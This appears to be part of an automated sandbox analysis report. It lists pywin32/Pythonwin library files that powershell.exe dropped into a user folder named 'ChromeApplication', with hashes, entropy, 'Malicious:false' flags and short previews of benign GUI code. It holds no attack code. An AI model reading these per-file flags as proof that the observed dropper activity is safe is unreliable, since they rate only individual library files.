                                                                                                                                                                                                  Preview:# The property page to define generic IDE options for Pythonwin..import win32con.import win32ui.from pywin.framework import interact.from pywin.mfc import dialog..buttonControlMap = {. win32ui.IDC_BUTTON1: win32ui.IDC_EDIT1,. win32ui.IDC_BUTTON2: win32ui.IDC_EDIT2,. win32ui.IDC_BUTTON3: win32ui.IDC_EDIT3,.}...class OptionsPropPage(dialog.PropertyPage):. def __init__(self):. dialog.PropertyPage.__init__(self, win32ui.IDD_PP_IDE). self.AddDDX(win32ui.IDC_CHECK1, "bShowAtStartup"). self.AddDDX(win32ui.IDC_CHECK2, "bDocking"). self.AddDDX(win32ui.IDC_EDIT4, "MRUSize", "i").. def OnInitDialog(self):. edit = self.GetDlgItem(win32ui.IDC_EDIT1). format = eval(. win32ui.GetProfileVal(. interact.sectionProfile,. interact.STYLE_INTERACTIVE_PROMPT,. str(interact.formatInput),. ). ). edit.SetDefaultCharFormat(format). edit.SetWindowText("Input Text")..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\dialogs\list.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4553
                                                                                                                                                                                                  Entropy (8bit):4.726357289573743
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:kpMCQUjD1MKBsVQnCD5kI7uVwVUoic6fpEQ7xKbmHBNx7W0WLdX:Sp4/VkGKQPaRH0X
                                                                                                                                                                                                  MD5:37C1CD1DB9F810C204351229638F2C9D
                                                                                                                                                                                                  SHA1:E978FC55B612FACA725B84ED0C11B2CC7E6316A9
                                                                                                                                                                                                  SHA-256:6D756D51A6286E343F91A946DF409B0B9CE72F5E153CEAB0E826494E3E919D79
                                                                                                                                                                                                  SHA-512:6AAC4751DDEC0BD84F3C018CCF589C2A11103034B051567CF240AD9116F371CD27FF396A0332B5C0D7536A44E0C8E69B07EDEB5D287EF906B0CEAF3C38D53B81
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import commctrl.import win32api.import win32con.import win32ui.from pywin.mfc import dialog...class ListDialog(dialog.Dialog):. def __init__(self, title, list):. dialog.Dialog.__init__(self, self._maketemplate(title)). self.HookMessage(self.on_size, win32con.WM_SIZE). self.HookNotify(self.OnListItemChange, commctrl.LVN_ITEMCHANGED). self.HookCommand(self.OnListClick, win32ui.IDC_LIST1). self.items = list.. def _maketemplate(self, title):. style = win32con.WS_DLGFRAME | win32con.WS_SYSMENU | win32con.WS_VISIBLE. ls = (. win32con.WS_CHILD. | win32con.WS_VISIBLE. | commctrl.LVS_ALIGNLEFT. | commctrl.LVS_REPORT. ). bs = win32con.WS_CHILD | win32con.WS_VISIBLE. return [. [title, (0, 0, 200, 200), style, None, (8, "MS Sans Serif")],. ["SysListView32", None, win32ui.IDC_LIST1, (0, 0, 200, 200), ls],. [128, "OK", win32con.IDOK, (10, 0, 50, 14)

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\dialogs\login.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4744
                                                                                                                                                                                                  Entropy (8bit):5.080896859294017
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SPqoa8f4F5CiR1nA8uAImdWA5v7eanAxKFze7pnAYzFE7rUK1Q9u:VHq4FXXR0C4KJ2za7rb1Q9u
                                                                                                                                                                                                  MD5:D195D5022F44190D561AB48990C86946
                                                                                                                                                                                                  SHA1:79B0039267F5031D1275E9D5492FEEFF0A9EAAEA
                                                                                                                                                                                                  SHA-256:BBF5069FC221AA0FB7F61C7051467DA298539F2E482A06A2677D69CC6E066F8C
                                                                                                                                                                                                  SHA-512:8D4D461B435712AB659AD385C82F5E6D77D2F268C18E426F115AE08BC4162BDCFC76092994CEE7827447F79C45818EEE54C8C0990715F4EDE7D22AF56646B397
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""login -- PythonWin user ID and password dialog box..(Adapted from originally distributed with Mark Hammond's PythonWin - .this now replaces it!)..login.GetLogin() displays a modal "OK/Cancel" dialog box with input.fields for a user ID and password. The password field input is masked.with *'s. GetLogin takes two optional parameters, a window title, and a.default user ID. If these parameters are omitted, the title defaults to."Login", and the user ID is left blank. GetLogin returns a (userid, password).tuple. GetLogin can be called from scripts running on the console - i.e. you.don't need to write a full-blown GUI app to use it...login.GetPassword() is similar, except there is no username field...Example:.import pywin.dialogs.login.title = "FTP Login".def_user = "fred".userid, password = pywin.dialogs.login.GetLogin(title, def_user)..Jim Eggleston, 28 August 1996.Merged with dlgpass and moved to pywin.dialogs by Mark Hammond Jan 1998.."""..import win32api.import win32con.import win32u

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\dialogs\status.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6620
                                                                                                                                                                                                  Entropy (8bit):4.812249113668442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JQ1QjYT2ZcpPc0C1HdNzJUMzmQuWyricJY:FY4GPY19pyMyQ/yrid
                                                                                                                                                                                                  MD5:6A26E58C5BCC0944CF185DEE3151FFE9
                                                                                                                                                                                                  SHA1:1F8F6D4E63D75DE35AEAD6DBDC7F1A54526D8249
                                                                                                                                                                                                  SHA-256:1AD3D9AF7B5328E179A0B8DDE615936A2191102DC5C2714A1752FA5E000D6DEE
                                                                                                                                                                                                  SHA-512:1D0AB59FB5EE3159612FCB34265437CF77C8150EC71C2F3799ED1FAC687237BD466A8F1A300F89B1591E27E82323A51A339D8F196C4B25A9ADA8FA26BFB0AD10
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# No cancel button...import threading.import time..import win32api.import win32con.import win32ui.from pywin.mfc import dialog.from pywin.mfc.thread import WinThread...def MakeProgressDlgTemplate(caption, staticText=""):. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE.. w = 215. h = 36 # With button. h = 40.. dlg = [. [caption, (0, 0, w, h), style, None, (8, "MS Sans Serif")],. ].. s = win32con.WS_TABSTOP | cs.. dlg.append([130, staticText, 1000, (7, 7, w - 7, h - 32), cs | win32con.SS_LEFT]).. # dlg.append([128,. # .."Cancel",. # ..win32con.IDCANCEL,. # ..(w - 60, h - 18, 50, 14), s | win32con.BS_PUSHBUTTON]).. return dlg...class CStatusProgressDialog(dialog.Dialog):. def __init__(self, title, msg="", maxticks=100, tickincr=1):. sel

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\docking\DockingBar.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23579
                                                                                                                                                                                                  Entropy (8bit):4.671711851438662
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lvLO4nM1rrzHrSxQvUKv+iqsP3Om2Qcb27xDoBC8n:lvLXn68QvdqsP3OmyCc
                                                                                                                                                                                                  MD5:F98244F1F98BB85FCA32EE2182156A42
                                                                                                                                                                                                  SHA1:2B44F1FB726A9650F1A7296721A5D40541B42CB5
                                                                                                                                                                                                  SHA-256:42235CF86B787BB402515C767DBB59121DB817388DEBB97AF40FAE19962DE0E9
                                                                                                                                                                                                  SHA-512:AFF2509180B031EEA98DD88F0899BF254A5A4B3AB6C9C19CAB6590C3007BE57DEEF02B8412A6C10913B705357167883B978596B0136F3DC36C99418CB5EF1F74
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# DockingBar.py..# Ported directly (comments and all) from the samples at www.codeguru.com..# WARNING: Use at your own risk, as this interface is highly likely to change..# Currently we support only one child per DockingBar. Later we need to add.# support for multiple children...import struct..import win32api.import win32con.import win32ui.from pywin.mfc import afxres, window..clrBtnHilight = win32api.GetSysColor(win32con.COLOR_BTNHILIGHT).clrBtnShadow = win32api.GetSysColor(win32con.COLOR_BTNSHADOW)...def CenterPoint(rect):. width = rect[2] - rect[0]. height = rect[3] - rect[1]. return rect[0] + width // 2, rect[1] + height // 2...def OffsetRect(rect, point):. (x, y) = point. return rect[0] + x, rect[1] + y, rect[2] + x, rect[3] + y...def DeflateRect(rect, point):. (x, y) = point. return rect[0] + x, rect[1] + y, rect[2] - x, rect[3] - y...def PtInRect(rect, pt):. return rect[0] <= pt[0] < rect[2] and rect[1] <= pt[1] < rect[3]...class DockingBar(window.Wnd):.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\app.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16191
                                                                                                                                                                                                  Entropy (8bit):4.775924492405953
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JNysLaI4QnYYoprzxlTRgiS/TeiMfwXYU8B8FFDqL6hiScShN+jduWnCSxMJYqIU:JIsLaTZEXYU8B8F9g6htbWnCBYqIG
                                                                                                                                                                                                  MD5:0B58622B03134430703357C9DCFB8143
                                                                                                                                                                                                  SHA1:ED939E49CE7D8D5925DC310F022878E21B4DB873
                                                                                                                                                                                                  SHA-256:844EE703077A5FA0FBBAD7C544AA19F5629E12033BD6A43CE22AE9B9F4E22CFE
                                                                                                                                                                                                  SHA-512:6F556DF3718F3B2ED767361B37B26F4F34FE9BBAD818FB6AD7937A6A1106F2A30CC99CD5F5CC97598EDC35C3FD9BF224204AADFA5062FD6E02818FA3C880843F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# App.py.# Application stuff..# The application is responsible for managing the main frame window..#.# We also grab the FileOpen command, to invoke our Python editor." The PythonWin application code. Manages most aspects of MDI, etc ".import os.import sys.import traceback..import regutil.import win32api.import win32con.import win32ui.from pywin.mfc import afxres, dialog, window.from pywin.mfc.thread import WinApp..from . import scriptutils..## NOTE: App and AppBuild should NOT be used - instead, you should contruct your.## APP class manually whenever you like (just ensure you leave these 2 params None!).## Whoever wants the generic "Application" should get it via win32iu.GetApp()..# These are "legacy".AppBuilder = None.App = None # default - if used, must end up a CApp derived class....# Helpers that should one day be removed!.def AddIdleHandler(handler):. print(. "app.AddIdleHandler is deprecated - please use win32ui.GetApp().AddIdleHandler() instead.". ). return win3

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\bitmap.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5358
                                                                                                                                                                                                  Entropy (8bit):4.861124149859075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:7Bn36/dTreIfMvipLRmt4plReR6MDfmDimiUmWiu+LmAnffbAWzvEFKTMVKMzkKj:FKBODuDNiPWr+LmAnffbA0vEFhwMvjJJ
                                                                                                                                                                                                  MD5:BE2C603FEF45B247DD96E6941230558C
                                                                                                                                                                                                  SHA1:739CE86445DA92C28DF4E5560AEE418ADF8C0740
                                                                                                                                                                                                  SHA-256:B7B3342709148684D7F7271FDF6BB3933E861F0AC07B1FECAADA56F31E76EEA4
                                                                                                                                                                                                  SHA-512:6A628FAAA0BE90D9161C4F3FB8075EC45BF614B93D2A428285F162E77C8FC2BA0EF07966A226E14113B72E31381D58D6D14D950A4B9D7F51941274D15FC4D4A8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import win32api.import win32con.import win32ui.from pywin.mfc import docview, window..from . import app..bStretch = 1...class BitmapDocument(docview.Document):. "A bitmap document. Holds the bitmap data itself.".. def __init__(self, template):. docview.Document.__init__(self, template). self.bitmap = None.. def OnNewDocument(self):. # I can not create new bitmaps.. win32ui.MessageBox("Bitmaps can not be created.").. def OnOpenDocument(self, filename):. self.bitmap = win32ui.CreateBitmap(). # init data members. f = open(filename, "rb"). try:. try:. self.bitmap.LoadBitmapFile(f). except IOError:. win32ui.MessageBox("Could not load the bitmap from %s" % filename). return 0. finally:. f.close(). self.size = self.bitmap.GetSize(). return 1.. def DeleteContents(self):. self.bitmap = None...class BitmapView

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\cmdline.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1491
                                                                                                                                                                                                  Entropy (8bit):4.129546707116888
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:DNgb2k92Xxx4ducdIF/rkjxtdkhHQ708TKQVYt3oIc5QzEn2GNdyw6h9i:Bgb2k8XxGducdYI1tdgQg8ZVYZJ/n2km
                                                                                                                                                                                                  MD5:42E00F8E2EF55BED99382BFF1B75471A
                                                                                                                                                                                                  SHA1:39876B183894E49930AAE96A9F8588520591EACA
                                                                                                                                                                                                  SHA-256:0D18159CFA599E233E188FFF4C5FC907ED47B372FFCAC1628398F0E88D9E735C
                                                                                                                                                                                                  SHA-512:31BF1E78C025BF5E4BAD323464CFB0937DD6F09772D6BE3D1C1275DB210956A38AB15F29534DFC7C89DDAA0E9A7F13F66DB1D3FC1B1985D0993074B3F7CA90EE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# cmdline - command line utilities..import string.import sys..import win32ui...def ParseArgs(str):. import string.. ret = []. pos = 0. length = len(str). while pos < length:. try:. while str[pos] in string.whitespace:. pos = pos + 1. except IndexError:. break. if pos >= length:. break. if str[pos] == '"':. pos = pos + 1. try:. endPos = str.index('"', pos) - 1. nextPos = endPos + 2. except ValueError:. endPos = length. nextPos = endPos + 1. else:. endPos = pos. while endPos < length and not str[endPos] in string.whitespace:. endPos = endPos + 1. nextPos = endPos + 1. ret.append(str[pos : endPos + 1].strip()). pos = nextPos. return ret...def FixArgFileName(fileName):. """Convert a filename on the commandline to something useful..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\dbgcommands.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6831
                                                                                                                                                                                                  Entropy (8bit):4.60734272249847
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:NUi+xH5OihJF9QLvIrG5Pl6BFZvg6XK6vd8mLlfRjTlOkZDLy08N8vFph8BZ/Ra0:NUi6vQmMP0tZ18uVlHH8WdL8b/RNXB
                                                                                                                                                                                                  MD5:C3DE464951525D4E0BB7A2432D996229
                                                                                                                                                                                                  SHA1:92F4F10AF324E3ECBEEC45BFEE83DF8A4BAB1C45
                                                                                                                                                                                                  SHA-256:8E92C21D7F8F48EB483FC04F4DA19E1980E88F5E5921CD91515C1978196B01A0
                                                                                                                                                                                                  SHA-512:8858A1B71D92F7A9BBC0389C8DF0A8E195513F24EBC400A9EB6A844172F1D5F34D0A0757ABC012C7F657777AD16A0A0360A53C49127009D90D0AFCAA0ED34D0B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Command Handlers for the debugger...# Not in the debugger package, as I always want these interfaces to be.# available, even if the debugger has not yet been (or can not be).# imported.import warnings..import win32ui.from pywin.scintilla.control import CScintillaEditInterface..from . import scriptutils..IdToBarNames = {. win32ui.IDC_DBG_STACK: ("Stack", 0),. win32ui.IDC_DBG_BREAKPOINTS: ("Breakpoints", 0),. win32ui.IDC_DBG_WATCH: ("Watch", 1),.}...class DebuggerCommandHandler:. def HookCommands(self):. commands = (. (self.OnStep, None, win32ui.IDC_DBG_STEP),. (self.OnStepOut, self.OnUpdateOnlyBreak, win32ui.IDC_DBG_STEPOUT),. (self.OnStepOver, None, win32ui.IDC_DBG_STEPOVER),. (self.OnGo, None, win32ui.IDC_DBG_GO),. (self.OnClose, self.OnUpdateClose, win32ui.IDC_DBG_CLOSE),. (self.OnAdd, self.OnUpdateAddBreakpoints, win32ui.IDC_DBG_ADD),. (self.OnClearAll, self.OnUpdateClearAllBreakpoints,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\dlgappcore.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2044
                                                                                                                                                                                                  Entropy (8bit):4.75480923449918
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:KU3pVVNXq5m1V+cm8mI3NqmtXWVh3mGvfhyMHnZZTOFwmLF:KU3pVVBq5+4cm8meqmtXjYfnyFwiF
                                                                                                                                                                                                  MD5:6A8C0BE282B0AEF1D76249DEABA9E980
                                                                                                                                                                                                  SHA1:864871CD5148A5D9BACAD2B45A3B0029AE4B3C66
                                                                                                                                                                                                  SHA-256:EE80DB72D088EF8E32B63E5284DEE6ABD7C142CDD2C6872B0B517A58672B6D7F
                                                                                                                                                                                                  SHA-512:1BFA636D9875F25A74A08396D5438E1448124DD6AFC49C120A76947836784E36BFA52B11FDDE515CCF0143158DB53C06C8D571FF8077153D21819981DFBF2890
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# dlgappcore..#.# base classes for dialog based apps....import win32api.import win32con.import win32ui.from pywin.mfc import dialog..from . import app..error = "Dialog Application Error"...class AppDialog(dialog.Dialog):. "The dialog box for the application".. def __init__(self, id, dll=None):. self.iconId = win32ui.IDR_MAINFRAME. dialog.Dialog.__init__(self, id, dll).. def OnInitDialog(self):. return dialog.Dialog.OnInitDialog(self).. # Provide support for a dlg app using an icon. def OnPaint(self):. if not self.IsIconic():. return self._obj_.OnPaint(). self.DefWindowProc(win32con.WM_ICONERASEBKGND, dc.GetHandleOutput(), 0). left, top, right, bottom = self.GetClientRect(). left = (right - win32api.GetSystemMetrics(win32con.SM_CXICON)) >> 1. top = (bottom - win32api.GetSystemMetrics(win32con.SM_CYICON)) >> 1. hIcon = win32ui.GetApp().LoadIcon(self.iconId). self.GetDC().DrawIcon((left, top),

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\editor\ModuleBrowser.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7057
                                                                                                                                                                                                  Entropy (8bit):4.439610719878647
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:kF/En0TXzbOA4R/mmLC1Wt1iC1ZqwVZv2xF6cOXJvVS6WgRUScswk2:klEcXzbitmZw/KF6VjS6WRh
                                                                                                                                                                                                  MD5:454C66BD909952ADDBB5A65C57809517
                                                                                                                                                                                                  SHA1:AB58FD5D10B1BDDDF0E7B9F2FE1FF48A054C8771
                                                                                                                                                                                                  SHA-256:D04E3A0D0132A7E26D7AAF3314934ADBF2F9F56E9E29E25D201B5D302F658266
                                                                                                                                                                                                  SHA-512:E291E4C6D94A6959819F02F214A5FBF503BD39E4C1090A432AAD1B2EC865D2BD51633448E03C8421379023E8DF1BD9E16D4257135713AA2B139EE642AF94F35B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ModuleBrowser.py - A view that provides a module browser for an editor document..import pyclbr..import afxres.import commctrl.import pywin.framework.scriptutils.import pywin.mfc.docview.import win32api.import win32con.import win32ui.from pywin.tools import browser, hierlist...class HierListCLBRModule(hierlist.HierListItem):. def __init__(self, modName, clbrdata):. self.modName = modName. self.clbrdata = clbrdata.. def GetText(self):. return self.modName.. def GetSubList(self):. ret = []. for item in self.clbrdata.values():. if (. item.__class__ != pyclbr.Class. ): # ie, it is a pyclbr Function instance (only introduced post 1.5.2). ret.append(HierListCLBRFunction(item)). else:. ret.append(HierListCLBRClass(item)). ret.sort(). return ret.. def IsExpandable(self):. return 1...class HierListCLBRItem(hierlist.HierListItem):. def __init__(se

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\editor\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2951
                                                                                                                                                                                                  Entropy (8bit):4.942933313190723
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:qBPlAgz+5ZK7c0v/7smwUxn6zDgxFEiJopf3ZAnKqMc:qAgzJ6UNDxO1pf3Z+f
                                                                                                                                                                                                  MD5:AA66EB26B463B110988121965DBCE948
                                                                                                                                                                                                  SHA1:2715FACC6E33390A8AB1D73AC10F42492419EFA7
                                                                                                                                                                                                  SHA-256:64390FDBF80467AB2C7A4E8BC3D3B2D80D6645FA215028D84EB9D518F09BDDEC
                                                                                                                                                                                                  SHA-512:6DE4FD8B77F86CE342D0EB335765BC6D89EF5DA8C335CD2A4065720D80B2E28910A9A04FF57FA26E4AADEF88BE6EB7327611E66394CEDFDB055E7D68AE3041A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# __init__ for the Pythonwin editor package..#.# We used to support optional editors - eg, color or non-color..#.# This really isnt necessary with Scintilla, and scintilla.# is getting so deeply embedded that it was too much work...import sys..import win32con.import win32ui..defaultCharacterFormat = (-402653169, 0, 200, 0, 0, 0, 49, "Courier New")..##def GetDefaultEditorModuleName():.##.import pywin.##.# If someone has set pywin.editormodulename, then this is what we use.##.try:.##..prefModule = pywin.editormodulename.##.except AttributeError:.##..prefModule = win32ui.GetProfileVal("Editor","Module", "").##.return prefModule.##.##def WriteDefaultEditorModule(module):.##.try:.##..module = module.__name__.##.except:.##..pass.##.win32ui.WriteProfileVal("Editor", "Module", module)...def LoadDefaultEditor():. pass...##.prefModule = GetDefaultEditorModuleName().##.restorePrefModule = None.##.mod = None.##.if prefModule:.##..try:.##...mod = __import__(prefModule).##..except 'xx':.##...msg

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\editor\color\coloreditor.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25627
                                                                                                                                                                                                  Entropy (8bit):4.755414140494236
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uze5N0VgInPYbtGLTtN3c3qUJF48Wi9FAWsCI0C4USCPuCbiPdeLDmPk8eLbxr8i:3PcP9qWiExI0Kk88bxrmbQ5gLM
                                                                                                                                                                                                  MD5:86D17F783F0F40790F86204C54AD2A71
                                                                                                                                                                                                  SHA1:CCBD0F896C3C68DF0E072E319F61BA1AB853054C
                                                                                                                                                                                                  SHA-256:FDE25DB1142ACF4D218A768A811A0CD4D0B52ECC3A1613E914F0D97E70A2554B
                                                                                                                                                                                                  SHA-512:AFC3E2C8E114B2D999DC35ECD06FBE37A368C6AC0D1E0717A5A7BFA6CA591269770C2184BF170392178C7268F32A038A07DA0408201FC7C7665132E3E06B0711
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Color Editor originally by Neil Hodgson, but restructured by mh to integrate.# even tighter into Pythonwin...import pywin.scintilla.keycodes.import win32api.import win32con.import win32ui.from pywin.framework.editor import (. GetEditorFontOption,. GetEditorOption,. SetEditorFontOption,. SetEditorOption,. defaultCharacterFormat,.).from pywin.scintilla import bindings..# from pywin.framework.editor import EditorPropertyPage..MSG_CHECK_EXTERNAL_FILE = (. win32con.WM_USER + 1999.) ## WARNING: Duplicated in document.py and editor.py..# Define a few common markers.MARKER_BOOKMARK = 0.MARKER_BREAKPOINT = 1.MARKER_CURRENT = 2..import pywin.scintilla.view.from pywin.debugger import dbgcon.from pywin.framework.editor.document import EditorDocumentBase.from pywin.scintilla import scintillacon # For the marker definitions.from pywin.scintilla.document import CScintillaDocument...class SyntEditDocument(EditorDocumentBase):. "A SyntEdit document.".. def OnDebuggerStateCha

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\editor\configui.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11603
                                                                                                                                                                                                  Entropy (8bit):4.979739602460823
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:jAwdGW/vgpdvJPbgwLJVwQ+aIRuUzCBLun:0ePg7LPhUV
                                                                                                                                                                                                  MD5:DAB3D0F83BCAACA8A0CA6A9C5FAAC11F
                                                                                                                                                                                                  SHA1:F4B5CEDC785B353D1666DFBA9C7AA4612694E478
                                                                                                                                                                                                  SHA-256:B43CF949918F7219CE1B58E53E416027E9F62BF1F480C69B1C65DC2C0DEB395F
                                                                                                                                                                                                  SHA-512:84BC325B67659409FF5485DBEBA99212CCF26CBE1C6308A51BB3B04165845D54B276058720236E6DD4DE93F1012AEE60AF49DE760173DD6C98965B3A52F9081D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import pywin.scintilla.config.import win32api.import win32con.import win32ui.from pywin.framework.editor import (. DeleteEditorOption,. GetEditorFontOption,. GetEditorOption,. SetEditorFontOption,. SetEditorOption,. defaultCharacterFormat,. editorTemplate,.).from pywin.mfc import dialog..from . import document..# The standard 16 color VGA palette should always be possible.paletteVGA = (. ("Black", 0, 0, 0),. ("Navy", 0, 0, 128),. ("Green", 0, 128, 0),. ("Cyan", 0, 128, 128),. ("Maroon", 128, 0, 0),. ("Purple", 128, 0, 128),. ("Olive", 128, 128, 0),. ("Gray", 128, 128, 128),. ("Silver", 192, 192, 192),. ("Blue", 0, 0, 255),. ("Lime", 0, 255, 0),. ("Aqua", 0, 255, 255),. ("Red", 255, 0, 0),. ("Fuchsia", 255, 0, 255),. ("Yellow", 255, 255, 0),. ("White", 255, 255, 255),.)...######################################################.#.# Property Page for editor options.#.class EditorPropertyPage(dialog.PropertyPage):. def

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\editor\document.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14762
                                                                                                                                                                                                  Entropy (8bit):4.505299678067443
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nqyDuI7alox51NGX/BZU0UV8w6a6tvte4H1SAmpo+QfnoPij:nqSelomnzUV8w6FGAoo+wnoKj
                                                                                                                                                                                                  MD5:E6508DD4684EA16A9987E983E189549D
                                                                                                                                                                                                  SHA1:20F8B1427713CEA8DA2FC25B2A76F5CDDC4EEBBF
                                                                                                                                                                                                  SHA-256:6348B90AA016AF071855E7C512E9A631AB0659F91BE3A2D737D6C54B5ABAC680
                                                                                                                                                                                                  SHA-512:EDE0B182E451EB6FC96466A4B4DB1EF12853C207662F2CB6765588AFE3BCE0E5B19FAE9D3E708AA7BD30EC329F46253D12943E55ADF948BA59193DD88EA467EC
                                                                                                                                                                                                  Malicious:false
